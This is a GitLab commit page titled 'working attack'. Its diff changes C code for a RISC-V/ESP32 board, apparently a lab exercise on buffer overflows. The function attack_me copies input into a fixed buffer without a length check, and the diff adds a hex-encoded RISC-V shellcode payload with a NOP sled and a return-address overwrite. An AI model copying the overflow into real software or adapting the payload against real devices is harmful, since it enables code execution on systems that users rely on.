Skip to content
Snippets Groups Projects
Commit 2cb7e6b4 authored by fptk's avatar fptk
Browse files

working attack

parent 60880cec
Branches
No related tags found
No related merge requests found
...@@ -78,7 +78,7 @@ int is_target(char *test) { ...@@ -78,7 +78,7 @@ int is_target(char *test) {
char *attack_me(char *data, uint32_t data_len) { char *attack_me(char *data, uint32_t data_len) {
// nobody could possibly enter a name longer than 20 characters, so this buffer // nobody could possibly enter a name longer than 20 characters, so this buffer
// is definitely large enough // is definitely large enough
char message[28]; char message[128];
memset(message, 'B', sizeof(message)); memset(message, 'B', sizeof(message));
memcpy(message, "Hallo, ", 7); memcpy(message, "Hallo, ", 7);
if(strncmp(data, get_target(), strlen(get_target())) == 0) { if(strncmp(data, get_target(), strlen(get_target())) == 0) {
...@@ -86,7 +86,7 @@ char *attack_me(char *data, uint32_t data_len) { ...@@ -86,7 +86,7 @@ char *attack_me(char *data, uint32_t data_len) {
snprintf(message + 13, 14 , " ist korrekt!"); snprintf(message + 13, 14 , " ist korrekt!");
} }
else { else {
memcpy(message + 7, data, strlen(data) + 2); memcpy(message + 7, data, data_len);
} }
char *result = malloc(strlen(message) + 1); char *result = malloc(strlen(message) + 1);
...@@ -114,63 +114,50 @@ int main(void) { ...@@ -114,63 +114,50 @@ int main(void) {
spi_init(SPICLOCK_80KHZ); spi_init(SPICLOCK_80KHZ);
//char *attack = "a12342234324452346234723482349234HAHA\x80\x12\x01\x20\xca\x13\x01\x20"; char *attack = "sBAUM";
//buffer address char *revattack = "a"
/*
* RISC SPEICHER: "\x37\x05\x01\x20" // 0: lui a0,0x20010
* MSB LSB "\x13\x05\xc5\x55" // 4: addi a0,a0,1372 # 0x2001055c
* 6C6C6148 = 'Hall' | 6c =108 = l "\x13\x0e\x00\x00" // 8: li t3,0
http://csci206sp2020.courses.bucknell.edu/files/2020/01/riscv-card.pdf "\x37\x1e\x01\x20" // c: lui t3,0x20011
lsb MSB "\x13\x0e\xce\x45" // 10: addi t3,t3,1116 # 0x2001145c
0 ...... 31 "\xe7\x0e\x0e\x00" // 14: jalr t4,t3
Lui a5,0x80001 "\x13\x00\x00\x00" // 18: nop
0110 1110 0001 1111 0011 1000 1000 0001
HEX=\x6e\x1f\x38\x81 "\x13\x00\x00\x00" // 20: nop
"\x13\x00\x00\x00" // 20: nop
"\x13\x00\x00\x00"
lw a5, -1375(a5) //1 less than in orig bin, otherwise 0 byte in payload "\x13\x00\x00\x00"
opcode rd f3 rs1 immediate "\x13\x00\x00\x00"
00000011 01110 010 01110 101010100001 "\x13\x00\x00\x00"
0000 0110 1110 0100 1110 1010 1010 0001 "\x13\x00\x00\x00"
HEX=\x06\xe4\xea\xa1 "\x13\x00\x00\x00"
"\x13\x00\x00\x00"
"\x13\x00\x00\x00"
addi a0, 15, 1 "\x13\x00\x00\x00"
opcode rd f3 rs1 immediate "\x13\x00\x00\x00"
0010011 01010 000 01110 000000000001 "\x13\x00\x00\x00"
0010 0110 1010 0000 1110 0000 0000 0001 "\x13\x00\x00\x00"
HEX=\x26\xa0\xe0\x01 "\x13\x00\x00\x00"
"\x13\x00\x00\x00"
"\x13\x00\x00\x00"
jal 0 offset "\x13\x00\x00\x00"
jal 0 0x200113ca "\x13\x00\x00\x00"
1101111 00000 100000000000010001001111001010 "\x13\x00\x00\x00"
1101 1110 0000 0001 0001 0011 1100 1010 "\x13\x00\x00\x00"
HEX=\xde\x01\x13\xca "\x13\x00\x00\x00"
"\x13\x00\x00\x00"
--> the assembly dump is: "\x13\x00\x00\x00"
lui a5, 0x80001 "\x13\x00\x00\x00"
lw a5, -1376(a5) "\x13\x00\x00\x00"
addi a0,15,0 == mv a0,a5
jal 0 offset "\xe4\x0e\x00\x80"
which results in hexdump: "\xe4\x0e\x00\x80";
\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca char *result = attack_me(revattack, 141);
that is 4 instructions each 4 bytes. //char *result = attack_me(attack, 120);
The buffer has 28 Bytes printf("result: %s", result);
The return address to overwrite lies at buffer+44 Bytes.
44-16-7=21 Bytes of garbage (-7 for "Hallo, ")
the new return address:
\x38\x0f\x00\x80
*/
char *attack = "a0aaa1aaa2aaa3aaa\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca\x12\x23\x34\x45\x50\x0f\x00\x80";
char *revattack = "a0aaa1aaa2aaa3aaa\x81\x38\x1f\x6e\xa1\xea\xe4\x06\x01\xe0\xa0\x26\xca\x13\x01\xde\x45\x34\x23\x12\x58\x0f\x00\x80";
char *result = attack_me(revattack, 26);
printf("%s", result);
/* /*
if(webserver_init(ESP32_NETWORK_IMPLEMENTATION) != 0) { if(webserver_init(ESP32_NETWORK_IMPLEMENTATION) != 0) {
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment